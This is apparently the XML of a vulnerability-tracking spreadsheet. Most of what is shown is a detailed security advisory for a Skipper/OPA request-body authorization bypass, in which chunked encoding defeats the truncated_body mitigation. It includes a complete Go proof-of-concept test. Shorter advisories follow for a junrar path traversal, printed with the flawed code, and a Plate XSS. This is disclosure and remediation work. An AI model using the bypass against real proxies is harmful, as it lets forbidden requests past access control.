Bypass of OPA request-body authorization for any deployment that adopted the official `truncated_body` mitigation. Requests that the policy is meant to reject (oversized / un-inspectable bodies, or bodies whose forbidden content lies beyond the inspection window) are authorized and forwarded in full to the protected upstream. Same security property and severity class as CVE-2026-50197 / GHSA-8qqm (both High).
## CVSS 3.1
Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` = **7.5 High**
- **AV:N** — remote HTTP request.
- **AC:L** — single crafted request; no race/special conditions (just chunked framing + padding).
- **PR:N / UI:N** — unauthenticated, no user interaction.
- **S:U** — impact within the authorized component/upstream trust scope.
- **C:N** — no direct disclosure by the bypass itself.
- **I:H** — authorization control is bypassed; forbidden request content reaches the upstream (integrity of the access-control decision / protected resource).
- **A:N** — not primarily an availability issue.
(Conditional: exploitable only where `opaAuthorizeRequestWithBody` is used with a `truncated_body`-gated policy — i.e. deployments that followed the GHSA-8qqm mitigation. Consistent with the conditional nature of the parent CVEs.)
## Proof of Concept
Executable Go test added to the OPA filter package. It stands up a real Skipper proxy (`proxy.WithParams`) + a real OPA control plane (`opasdktest`) with `WithMaxRequestBodyBytes(32)` and the advisory's verbatim mitigation policy (`allow if input.truncated_body == false`), routed to a recording upstream.
- **Positive control** — oversized body **with Content-Length** → `truncated_body=true` → **403** (mitigation works).
- **Bypass** — identical oversized body sent **chunked** (no Content-Length) → `truncated_body=false` → **200**, and the upstream receives the **full** 66-byte payload past the 32-byte inspection cap.
Command and observed benign output:
```
$ go test ./filters/openpolicyagent/ -run TestTruncatedBodyChunkedBypass -count=1 -v
    poc_truncated_body_chunked_test.go:148: [content-length ] status=403 upstream_body_bytes=-1
    poc_truncated_body_chunked_test.go:154: [chunked        ] status=200 upstream_body_bytes=66
--- PASS: TestTruncatedBodyChunkedBypass (0.11s)
PASS
```
- content-length variant → **403**, upstream received nothing (`-1`) — mitigation works.
- chunked variant (byte-identical body) → **200**, upstream received the **full 66-byte** payload past the 32-byte cap — **authorization bypass**.
(Full PoC source is appended below by the submission tool via `--poc-file`.)
## Adversarial re-read (refutation attempts)
- *"Truncated JSON just fails to parse → fail closed."* True for `application/json` when truncation lands mid-token, but the bypass does not rely on JSON: `application/x-www-form-urlencoded` parses leniently after truncation, and unparsed/absent content-types return `(nil, false, nil)` with no error. The load-bearing signal is `truncated_body`, not `parsed_body`, and it is `false` in all these cases.
- *"Maybe Skipper adds a content-length for chunked before OPA sees it."* No — `AdaptToExtAuthRequest` copies `req.Header` verbatim (lowercased); a chunked request has no `content-length` header, and net/http does not synthesise one. Confirmed by reading `skipperadapter.go`.
- *"Maybe the mitigation is `deny if truncated_body == true` (allow-by-default), which is unaffected."* Both shapes in the advisory rely on `truncated_body` correctly reflecting truncation; the deny-if shape simply *fails to deny* under the same chunked condition. The allow-if shape (shown) fails open directly.
- *"Is this already covered by CVE-2026-50197?"* No. 50197 was the *empty-body* chunked bypass (OPA saw no body); its fix makes OPA see the truncated prefix. GHSA-8qqm was the declared-Content-Length oversized variant; its fix populates `parsed_body` and recommends `truncated_body`. Neither addresses `truncated_body` being unset for chunked/HTTP-2 oversized bodies. The 8qqm positive-control test only used small chunked bodies.
Result: survives refutation; concrete, reproducible bypass of the published mitigation. Differentiation check passes (incomplete-fix of a published advisory, not a generic surface bug).
## Remediation
Do not rely on the client-supplied `content-length` header to detect truncation. Skipper should signal truncation authoritatively to OPA rather than delegating to the plugin's Content-Length heuristic. Concretely, in `ExtractHttpBodyOptionally`, detect that the underlying body still has bytes after `maxBodyBytes` were buffered (e.g. attempt one more read / peek) and propagate a definitive truncation indicator — for example by setting a synthetic `content-length` (or a dedicated context extension / metadata field) that reflects the real truncation state, so `input.truncated_body` is `true` whenever the body was actually cut, regardless of transfer encoding. Alternatively, reject (413) requests whose body exceeds `maxBodyBytes` when body-based authorization is enabled, instead of silently truncating. Upstream, `opa-envoy-plugin` should treat "body present but not fully inspectable and no content-length" as truncated rather than defaulting to `false`.
## Confidence
High. Root cause verified in both Skipper and the pinned `opa-envoy-plugin@v1.14.1-envoy` source; executable PoC demonstrates the status/upstream-body divergence against the maintainer's own recommended mitigation.
## Proof-of-Concept source (`poc_truncated_body_chunked_test.go`)
```go
package openpolicyagent_test
import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"strings"
	"sync/atomic"
	"testing"
	"time"
	opasdktest "github.com/open-policy-agent/opa/v1/sdk/test"
	"github.com/stretchr/testify/assert"
	"github.com/zalando/skipper/eskip"
	"github.com/zalando/skipper/filters"
	"github.com/zalando/skipper/filters/builtin"
	"github.com/zalando/skipper/filters/openpolicyagent"
	"github.com/zalando/skipper/filters/openpolicyagent/opaauthorizerequest"
	"github.com/zalando/skipper/proxy"
	"github.com/zalando/skipper/routing"
	"github.com/zalando/skipper/routing/testdataclient"
)
// TestTruncatedBodyChunkedBypass demonstrates that the GHSA-8qqm-fp2q-v734
// mitigation ("check input.truncated_body in your policy") fails OPEN when the
// oversized request is sent with Transfer-Encoding: chunked (no Content-Length).
//
// The mitigation Rego (verbatim from the advisory):
//
//	default allow := false
//	allow if { input.truncated_body == false }
//
// truncated_body is derived by the OPA envoy plugin ONLY when a content-length
// header is present (opa-envoy-plugin envoyauth/request.go getParsedBody -&gt;
// checkIfHTTPBodyTruncated). A chunked / HTTP-2 request carries no
// content-length, so truncated_body stays false even though Skipper truncated
// the body to max-request-body-size. The mitigated policy therefore ALLOWS an
// oversized body and the full payload reaches upstream.
func TestTruncatedBodyChunkedBypass(t *testing.T) {
	const maxBody = 32
	// oversized url-encoded payload: "a=" + 64 * "A" = 66 bytes &gt; 32.
	payload := "a=" + strings.Repeat("A", 64)
	// upstream records how many body bytes it actually received.
	var upstreamBytes atomic.Int64
	backend := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		n, _ := io.Copy(io.Discard, r.Body)
		upstreamBytes.Store(n)
		w.WriteHeader(200)
		w.Write([]byte("OK"))
	}))
	defer backend.Close()
	bundleName := "test-bundle"
	opaControlPlane := opasdktest.MustNewServer(
		opasdktest.MockBundle("/bundles/"+bundleName, map[string]string{
			// The exact mitigation the advisory recommends.
			"main.rego": `
package envoy.authz
import rego.v1
default allow := false
allow if {
    input.truncated_body == false
}
`,
		}),
	)
	defer opaControlPlane.Stop()
	config := fmt.Appendf(nil, `{
		"services": {"test": {"url": %q}},
		"bundles": {"test": {"resource": "/bundles/{{ .bundlename }}"}},
		"labels": {"environment": "test"},
		"plugins": {"envoy_ext_authz_grpc": {"path": "envoy/authz/allow", "dry-run": false}}
	}`, opaControlPlane.URL())
	opaRegistry, err := openpolicyagent.NewOpenPolicyAgentRegistry(
		openpolicyagent.WithPreloadingEnabled(true),
		openpolicyagent.WithEnableDataPreProcessingOptimization(true),
		openpolicyagent.WithInstanceStartupTimeout(5*time.Second),
		openpolicyagent.WithMaxRequestBodyBytes(maxBody),
		openpolicyagent.WithOpenPolicyAgentInstanceConfig(
			openpolicyagent.WithConfigTemplate(config)),
	)
	if err != nil {
		t.Fatalf("opaRegistry: %v", err)
	}
	defer opaRegistry.Close()
	fr := make(filters.Registry)
	fr.Register(opaauthorizerequest.NewOpaAuthorizeRequestWithBodySpec(opaRegistry))
	fr.Register(builtin.NewSetPath())
	docFmt := `r1: * -&gt; opaAuthorizeRequestWithBody("%s") -&gt; "%s";`
	r := eskip.MustParse(fmt.Sprintf(docFmt, bundleName, backend.URL))
	dc := testdataclient.New(r)
	defer dc.Close()
	rt := routing.New(routing.Options{
		FilterRegistry:  fr,
		DataClients:     []routing.DataClient{dc},
		PreProcessors:   []routing.PreProcessor{opaRegistry.NewPreProcessor()},
		PostProcessors:  []routing.PostProcessor{opaRegistry},
		PollTimeout:     time.Second,
		SignalFirstLoad: true,
	})
	defer rt.Close()
	&lt;-rt.FirstLoad()
	pr := proxy.WithParams(proxy.Params{Routing: rt})
	defer pr.Close()
	ts := httptest.NewServer(pr)
	defer ts.Close()
	inst, err := opaRegistry.GetOrStartInstance(bundleName)
	assert.NoError(t, err)
	assert.NotNil(t, inst)
	doReq := func(chunked bool) (int, int64) {
		upstreamBytes.Store(-1)
		req, err := http.NewRequest("POST", ts.URL, strings.NewReader(payload))
		if err != nil {
			t.Fatalf("new request: %v", err)
		}
		req.Header.Set("Content-Type", "application/x-www-form-urlencoded")
		if chunked {
			// Force chunked framing: no Content-Length reaches the server,
			// so the server sees req.ContentLength == -1.
			req.ContentLength = -1
			req.TransferEncoding = []string{"chunked"}
		}
		rsp, err := ts.Client().Do(req)
		if err != nil {
			t.Fatalf("do: %v", err)
		}
		io.Copy(io.Discard, rsp.Body)
		rsp.Body.Close()
		return rsp.StatusCode, upstreamBytes.Load()
	}
	// POSITIVE CONTROL: oversized body WITH Content-Length.
	// truncated_body == true  -&gt; policy denies. Mitigation works as designed.
	clStatus, clUpstream := doReq(false)
	t.Logf("[content-length ] status=%d upstream_body_bytes=%d", clStatus, clUpstream)
	assert.Equal(t, 403, clStatus, "oversized body with Content-Length must be DENIED (mitigation working)")
	// BYPASS: identical oversized body sent CHUNKED (no Content-Length).
	// truncated_body == false -&gt; policy ALLOWS -&gt; full payload reaches upstream.
	chStatus, chUpstream := doReq(true)
	t.Logf("[chunked        ] status=%d upstream_body_bytes=%d", chStatus, chUpstream)
	assert.Equal(t, 200, chStatus, "BYPASS: oversized chunked body was ALLOWED by the truncated_body mitigation")
	assert.Equal(t, int64(len(payload)), chUpstream,
		"BYPASS: upstream received the FULL oversized payload past OPA authorization")
}
```</t>
        </is>
      </c>
      <c r="T94" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="95">
      <c r="A95" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B95" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C95" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86071</t>
        </is>
      </c>
      <c r="D95" s="5" t="inlineStr"/>
      <c r="E95" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F95" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G95" s="5" t="inlineStr"/>
      <c r="H95" s="5" t="inlineStr"/>
      <c r="I95" s="5" t="inlineStr"/>
      <c r="J95" s="5" t="inlineStr"/>
      <c r="K95" s="5" t="inlineStr"/>
      <c r="L95" s="5" t="inlineStr">
        <is>
          <t>maven:com.github.junrar:junrar</t>
        </is>
      </c>
      <c r="M95" s="5" t="inlineStr">
        <is>
          <t>7.6.1</t>
        </is>
      </c>
      <c r="N95" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O95" s="5" t="inlineStr"/>
      <c r="P95" s="5" t="inlineStr"/>
      <c r="Q95" s="5" t="inlineStr"/>
      <c r="R95" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S95" s="5" t="inlineStr">
        <is>
          <t>## Summary
`LocalFolderExtractor` validates only the final canonical file path before extraction. However, `makeFile()` creates intermediate directories one path segment at a time without checking whether each created directory remains inside the destination folder.
A malicious RAR entry can make the final file path resolve inside the extraction destination, while causing intermediate `mkdir()` calls to create attacker-chosen directories outside the extraction root.
This is an extraction root escape via unchecked intermediate directory creation. The default impact is directory creation outside the intended destination, not unconditional arbitrary file content write.
## Affected Code
- `src/main/java/com/github/junrar/LocalFolderExtractor.java`
  - `createFile()` checks only the final canonical path.
  - `makeFile()` calls `dir.mkdir()` for each intermediate segment without containment checks.
Relevant code flow:
```java
private File createFile(final FileHeader fh, final File destination) throws IOException {
    String name = invariantSeparatorsPathString(fh.getFileName());
    File f = new File(destination, name);
    String dirCanonPath = f.getCanonicalPath();
    if (!dirCanonPath.startsWith(destination.getCanonicalPath() + File.separator)) {
        throw new IllegalStateException(...);
    }
    if (!f.exists()) {
        f = makeFile(destination, name);
    }
    return f;
}
private File makeFile(final File destination, final String name) throws IOException {
    final String[] dirs = name.split("/");
    String path = "";
    for (int i = 0; i &lt; dirs.length - 1; i++) {
        path = path + File.separator + dirs[i];
        File dir = new File(destination, path);
        dir.mkdir();
    }
    path = path + File.separator + dirs[dirs.length - 1];
    final File f = new File(destination, path);
    f.createNewFile();
    return f;
}
```
## Impact
An attacker who can supply a malicious RAR archive can create directories outside the intended extraction directory.
This violates the expected extraction boundary and can be used for filesystem pollution or file-vs-directory squatting. For example, an attacker can create a directory at a path where a later security-sensitive file is expected, causing future writes to that path to fail.</t>
        </is>
      </c>
      <c r="T95" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86071</t>
        </is>
      </c>
    </row>
    <row r="96">
      <c r="A96" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B96" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C96" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88976</t>
        </is>
      </c>
      <c r="D96" s="5" t="inlineStr"/>
      <c r="E96" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F96" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G96" s="5" t="inlineStr"/>
      <c r="H96" s="5" t="inlineStr"/>
      <c r="I96" s="5" t="inlineStr"/>
      <c r="J96" s="5" t="inlineStr"/>
      <c r="K96" s="5" t="inlineStr"/>
      <c r="L96" s="5" t="inlineStr">
        <is>
          <t>npm:@platejs/core</t>
        </is>
      </c>
      <c r="M96" s="5" t="inlineStr">
        <is>
          <t>53.3.11</t>
        </is>
      </c>
      <c r="N96" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O96" s="5" t="inlineStr"/>
      <c r="P96" s="5" t="inlineStr"/>
      <c r="Q96" s="5" t="inlineStr"/>
      <c r="R96" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="S96" s="5" t="inlineStr">
        <is>
          <t>### Summary
HTML strings passed to Plate's core deserialization APIs were parsed in the active document. Certain HTML attributes could therefore trigger browser behavior during parsing, before the content was converted into editor nodes.
Applications that deserialize HTML from untrusted or cross-user sources may be affected.
### Impact
An attacker who can control HTML later deserialized in another user's browser may be able to execute script in that application's origin.
### Remediation
Upgrade to `@platejs/core` 53.3.11 or later. Users of the discontinued 54.0.0 beta builds should install the fixed stable line. Applications should also sanitize untrusted HTML before rendering it; inert parsing is not a substitute for sanitization.</t>
        </is>
      </c>
      <c r="T96" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88976</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T96"/>
  <conditionalFormatting sqref="E2:E9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9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2026-09-18T11:29:58Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-09-18T11:30:01Z</dcterms:modified>
</cp:coreProperties>
</file>